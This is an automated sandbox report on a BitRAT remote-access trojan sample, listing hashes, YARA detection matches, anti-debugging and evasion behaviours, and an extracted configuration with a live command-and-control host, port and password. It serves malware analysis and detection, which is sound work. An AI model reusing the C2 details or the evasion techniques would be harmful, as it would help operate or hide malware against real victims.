Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mzQcZawXvh.exe

Overview

General Information

Sample Name:mzQcZawXvh.exe
Analysis ID:589699
MD5:514837c22746ae83fad96926ad2ddf83
SHA1:e23e87f578c20f743ca1460d5e744c10b629cc16
SHA256:beced991de014438e5a42627fd44721a06fd4fa67b8a58319fc00eb6316169a1
Tags:BitRATexeRAT
Infos:

Detection

BitRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected BitRAT
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Hides threads from debuggers
Machine Learning detection for sample
Injects a PE file into a foreign processes
Contains functionality to hide a thread from the debugger
C2 URLs / IPs found in malware configuration
Possible FUD Crypter (malicious underground PE packer) detected
Uses dynamic DNS services
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Installs a global mouse hook
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • mzQcZawXvh.exe (PID: 5872 cmdline: "C:\Users\user\Desktop\mzQcZawXvh.exe" MD5: 514837C22746AE83FAD96926AD2DDF83)
    • mzQcZawXvh.exe (PID: 5012 cmdline: "C:\Users\user\Desktop\mzQcZawXvh.exe" MD5: 514837C22746AE83FAD96926AD2DDF83)
  • cleanup
{"Host": "toopdyno2.duckdns.org", "Port": "55140", "Tor Port": "0", "Install Dir": "0", "Install File": "0", "Communication Password": "3cd2623273605167e72c665ad9347c60", "Tor Process Name": "tor"}
SourceRuleDescriptionAuthorStrings
00000001.00000000.252764032.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_BitRATYara detected BitRATJoe Security
    00000001.00000000.252764032.0000000000400000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_BitRATDetects BitRAT RATditekSHen
    • 0x33bbf0:$s1: \plg\
    • 0x33bd70:$s3: files_delete
    • 0x33a9bc:$s9: ddos_stop
    • 0x33bbd0:$s10: socks5_srv_start
    • 0x33bdb8:$s16: klg|
    • 0x33a9ec:$s17: Slowloris
    • 0x33bc60:$s18: Bot ID:
    • 0x33c198:$t1: <sz>N/A</sz>
    00000001.00000000.251383367.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_BitRATYara detected BitRATJoe Security
      00000001.00000000.251383367.0000000000400000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_BitRATDetects BitRAT RATditekSHen
      • 0x33bbf0:$s1: \plg\
      • 0x33bd70:$s3: files_delete
      • 0x33a9bc:$s9: ddos_stop
      • 0x33bbd0:$s10: socks5_srv_start
      • 0x33bdb8:$s16: klg|
      • 0x33a9ec:$s17: Slowloris
      • 0x33bc60:$s18: Bot ID:
      • 0x33c198:$t1: <sz>N/A</sz>
      00000001.00000000.246514986.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_BitRATYara detected BitRATJoe Security
        Click to see the 13 entries
        SourceRuleDescriptionAuthorStrings
        1.0.mzQcZawXvh.exe.400000.5.raw.unpackJoeSecurity_BitRATYara detected BitRATJoe Security
          1.0.mzQcZawXvh.exe.400000.3.unpackJoeSecurity_BitRATYara detected BitRATJoe Security
            1.0.mzQcZawXvh.exe.400000.0.unpackJoeSecurity_BitRATYara detected BitRATJoe Security
              1.0.mzQcZawXvh.exe.400000.1.unpackJoeSecurity_BitRATYara detected BitRATJoe Security
                1.0.mzQcZawXvh.exe.400000.2.unpackJoeSecurity_BitRATYara detected BitRATJoe Security
                  Click to see the 36 entries

                  There are no malicious signatures, click here to show all signatures.

                  Source: Process startedAuthor: frack113: Data: Command: "C:\Users\user\Desktop\mzQcZawXvh.exe" , CommandLine: "C:\Users\user\Desktop\mzQcZawXvh.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\mzQcZawXvh.exe, NewProcessName: C:\Users\user\Desktop\mzQcZawXvh.exe, OriginalFileName: C:\Users\user\Desktop\mzQcZawXvh.exe, ParentCommandLine: "C:\Users\user\Desktop\mzQcZawXvh.exe" , ParentImage: C:\Users\user\Desktop\mzQcZawXvh.exe, ParentProcessId: 5872, ProcessCommandLine: "C:\Users\user\Desktop\mzQcZawXvh.exe" , ProcessId: 5012

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 00000001.00000000.252764032.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: BitRat {"Host": "toopdyno2.duckdns.org", "Port": "55140", "Tor Port": "0", "Install Dir": "0", "Install File": "0", "Communication Password": "3cd2623273605167e72c665ad9347c60", "Tor Process Name": "tor"}
                  Source: mzQcZawXvh.exeMetadefender: Detection: 20%Perma Link
                  Source: mzQcZawXvh.exeReversingLabs: Detection: 48%
                  Source: toopdyno2.duckdns.orgAvira URL Cloud: Label: malware
                  Source: mzQcZawXvh.exeJoe Sandbox ML: detected
                  Source: mzQcZawXvh.exe, 00000000.00000002.257225352.00000000024E0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----
                  Source: mzQcZawXvh.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: Binary string: x4C:\fipopovo-kogite\sinagume.pdb source: mzQcZawXvh.exe
                  Source: Binary string: C:\fipopovo-kogite\sinagume.pdb source: mzQcZawXvh.exe
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_004269D4 GetFullPathNameW,FindFirstFileExW,GetLastError,1_2_004269D4

                  Networking

                  barindex
                  Source: Malware configuration extractorURLs: toopdyno2.duckdns.org
                  Source: unknownDNS query: name: toopdyno2.duckdns.org
                  Source: Joe Sandbox ViewASN Name: ESAB-ASSE ESAB-ASSE
                  Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.213.155.164:55140
                  Source: mzQcZawXvh.exe, mzQcZawXvh.exe, 00000001.00000000.252764032.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mzQcZawXvh.exe, 00000001.00000000.246514986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mzQcZawXvh.exe, 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                  Source: unknownDNS traffic detected: queries for: toopdyno2.duckdns.org
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_00415782 WSARecv,1_2_00415782
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeWindows user hook set: 0 mouse low level NULLJump to behavior

                  System Summary

                  barindex
                  Source: 1.0.mzQcZawXvh.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 1.0.mzQcZawXvh.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 1.0.mzQcZawXvh.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 1.0.mzQcZawXvh.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 1.0.mzQcZawXvh.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 1.0.mzQcZawXvh.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 1.2.mzQcZawXvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 1.0.mzQcZawXvh.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 1.2.mzQcZawXvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 1.0.mzQcZawXvh.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 1.0.mzQcZawXvh.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 1.0.mzQcZawXvh.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 0.2.mzQcZawXvh.exe.24e15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 1.0.mzQcZawXvh.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 0.2.mzQcZawXvh.exe.24e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 1.0.mzQcZawXvh.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 1.0.mzQcZawXvh.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 1.0.mzQcZawXvh.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 00000001.00000000.252764032.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 00000001.00000000.251383367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 00000001.00000000.246514986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 00000001.00000000.247549851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 00000001.00000000.249134372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 00000001.00000000.253448623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects BitRAT RAT Author: ditekSHen
                  Source: mzQcZawXvh.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: 1.0.mzQcZawXvh.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 1.0.mzQcZawXvh.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 1.0.mzQcZawXvh.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 1.0.mzQcZawXvh.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 1.0.mzQcZawXvh.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 1.0.mzQcZawXvh.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 1.2.mzQcZawXvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 1.0.mzQcZawXvh.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 1.2.mzQcZawXvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 1.0.mzQcZawXvh.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 1.0.mzQcZawXvh.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 1.0.mzQcZawXvh.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 0.2.mzQcZawXvh.exe.24e15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 1.0.mzQcZawXvh.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 0.2.mzQcZawXvh.exe.24e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 1.0.mzQcZawXvh.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 1.0.mzQcZawXvh.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 1.0.mzQcZawXvh.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 00000001.00000000.252764032.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 00000001.00000000.251383367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 00000001.00000000.246514986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 00000001.00000000.247549851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 00000001.00000000.249134372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 00000001.00000000.253448623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 0_2_00413DD00_2_00413DD0
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 0_2_00414BB00_2_00414BB0
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_0068C54E1_2_0068C54E
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_004FA6521_2_004FA652
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_0040EA721_2_0040EA72
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_0042AE391_2_0042AE39
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_0042CF4C1_2_0042CF4C
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_004BAF5C1_2_004BAF5C
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_006930971_2_00693097
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_0042711E1_2_0042711E
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_004113C31_2_004113C3
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_0069D3C01_2_0069D3C0
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: String function: 00411DDD appears 133 times
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: String function: 0068A4E0 appears 58 times
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: String function: 00411A50 appears 101 times
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: String function: 0068A19C appears 116 times
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: String function: 006B9C3C appears 728 times
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: String function: 005D8230 appears 98 times
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: String function: 00411AAE appears 38 times
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: String function: 006909D0 appears 71 times
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: String function: 0068E3DE appears 66 times
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: String function: 0040E1A0 appears 136 times
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_0047DA23 __EH_prolog,GetModuleHandleA,GetProcAddress,GetCurrentThread,NtSetInformationThread,1_2_0047DA23
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_005CF200: CreateFileW,new,DeviceIoControl,CloseHandle,1_2_005CF200
                  Source: mzQcZawXvh.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: mzQcZawXvh.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: mzQcZawXvh.exeMetadefender: Detection: 20%
                  Source: mzQcZawXvh.exeReversingLabs: Detection: 48%
                  Source: mzQcZawXvh.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\mzQcZawXvh.exe "C:\Users\user\Desktop\mzQcZawXvh.exe"
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeProcess created: C:\Users\user\Desktop\mzQcZawXvh.exe "C:\Users\user\Desktop\mzQcZawXvh.exe"
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeProcess created: C:\Users\user\Desktop\mzQcZawXvh.exe "C:\Users\user\Desktop\mzQcZawXvh.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E436EBB3-524F-11CE-9F53-0020AF0BA770}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_0047E75C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,1_2_0047E75C
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@3/0@638/2
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 0_2_00409FD0 __wremove,_putc,_puts,_atexit,_malloc,_perror,InitializeCriticalSection,EnterCriticalSection,GetBinaryTypeW,GetConsoleAliasExesA,GetBinaryTypeW,GetConsoleAliasExesA,InitializeCriticalSection,EnterCriticalSection,GetNumberFormatW,WriteConsoleOutputCharacterA,ReadConsoleW,SetThreadPriority,FindNextVolumeMountPointW,SetProcessShutdownParameters,GetConsoleAliasesLengthW,SetProcessAffinityMask,OpenFileMappingW,OpenWaitableTimerW,AreFileApisANSI,CancelDeviceWakeupRequest,FindFirstVolumeA,GetConsoleAliasesLengthA,WinHttpConnect,GetLastError,GetCharWidthA,GetConsoleAliasesLengthA,WinHttpConnect,AlphaBlend,GetComputerNameW,TlsFree,DeleteAtom,GetModuleHandleW,EnumDateFormatsA,TlsFree,WriteConsoleOutputCharacterA,LoadLibraryW,DeleteAtom,GetModuleHandleW,GetPrivateProfileStringA,FreeEnvironmentStringsA,ResetWriteWatch,MoveFileA,GetConsoleAliasExesLengthW,EnumSystemLocalesW,_lopen,_lwrite,SetSystemTimeAdjustment,DebugBreak,MoveFileWithProgressA,SetCommState,EnumDateFormatsA,CreateMailslotW,WriteConsoleInputW,GetConsoleAliasExesLengthA,SetComputerNameW,GlobalGetAtomNameA,AllocConsole,GetQueuedCompletionStatus,GetProfileStringW,GetSystemWindowsDirectoryA,SetConsoleCP,VerSetConditionMask,EnumDateFormatsA,SetThreadAffinityMask,SetThreadAffinityMask,EnumCalendarInfoA,lstrcatA,LocalAlloc,FormatMessageW,FreeEnvironmentStringsA,EnumCalendarInfoA,lstrcatA,LocalAlloc,FormatMessageW,WriteConsoleInputW,GlobalWire,GetPrivateProfileSectionNamesA,WriteConsoleA,ReadConsoleW,DebugBreak,LoadLibraryW,lstrlenA,EnumResourceTypesA,OutputDebugStringW,_lwrite,GetConsoleAliasA,CreateActCtxW,GetPrivateProfileStringA,GetACP,CopyFileA,GetSystemWindowsDirectoryA,InterlockedExchangeAdd,ContinueDebugEvent,SetConsoleCursorPosition,GetConsoleAliasExesLengthA,0_2_00409FD0
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeMutant created: \Sessions\1\BaseNamedObjects\71829ba4b664877b4343fec94f23404f
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_00422D5E __CxxThrowException@8,GetLastError,LoadResource,LockResource,SizeofResource,1_2_00422D5E
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCommand line argument: Firekax0_2_00409FD0
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCommand line argument: Noyucamirohanic0_2_00409FD0
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCommand line argument: z<B0_2_00409FD0
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCommand line argument: z<B0_2_00409FD0
                  Source: mzQcZawXvh.exeString found in binary or memory: id-cmc-addExtensions
                  Source: mzQcZawXvh.exeString found in binary or memory: set-addPolicy
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: mzQcZawXvh.exeStatic file information: File size 2180096 > 1048576
                  Source: mzQcZawXvh.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1e4800
                  Source: mzQcZawXvh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: mzQcZawXvh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: mzQcZawXvh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: mzQcZawXvh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: mzQcZawXvh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: mzQcZawXvh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: mzQcZawXvh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: x4C:\fipopovo-kogite\sinagume.pdb source: mzQcZawXvh.exe
                  Source: Binary string: C:\fipopovo-kogite\sinagume.pdb source: mzQcZawXvh.exe
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 0_2_00409742 push ecx; mov dword ptr [esp], 00000000h0_2_00409751
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 0_2_00409770 push ecx; mov dword ptr [esp], 00000002h0_2_00409771
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 0_2_004097A0 push ecx; mov dword ptr [esp], 00000000h0_2_004097A1
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 0_2_022FCAC3 push ebp; retf 0_2_022FCAD2
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 0_2_022FD341 pushad ; iretd 0_2_022FD344
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 0_2_023005B8 push cs; retf 0_2_023005C4
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_0068A4A9 push ecx; ret 1_2_0068A4BC
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_0068B486 push ecx; ret 1_2_0068B499
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 0_2_0041A080 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,0_2_0041A080

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeFUD Crypter parameteres: EnumResourceTypesA, 86, 75, 5, 4470_2_00409FD0
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeFUD Crypter parameteres: EnumResourceTypesA, 80, 69, 4, 4170_2_0040A039
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exe TID: 5612Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exe TID: 3904Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exe TID: 5700Thread sleep time: -105000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-38780
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeThread sleep count: Count: 2493 delay: -10Jump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-14878
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-15026
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeWindow / User API: threadDelayed 2493Jump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeWindow / User API: threadDelayed 392Jump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeAPI coverage: 9.5 %
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeAPI coverage: 8.4 %
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_0044DE59 __EH_prolog,new,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetProductInfo,1_2_0044DE59
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_004269D4 GetFullPathNameW,FindFirstFileExW,GetLastError,1_2_004269D4
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeAPI call chain: ExitProcess graph end nodegraph_0-15027

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeThread information set: HideFromDebuggerJump to behavior
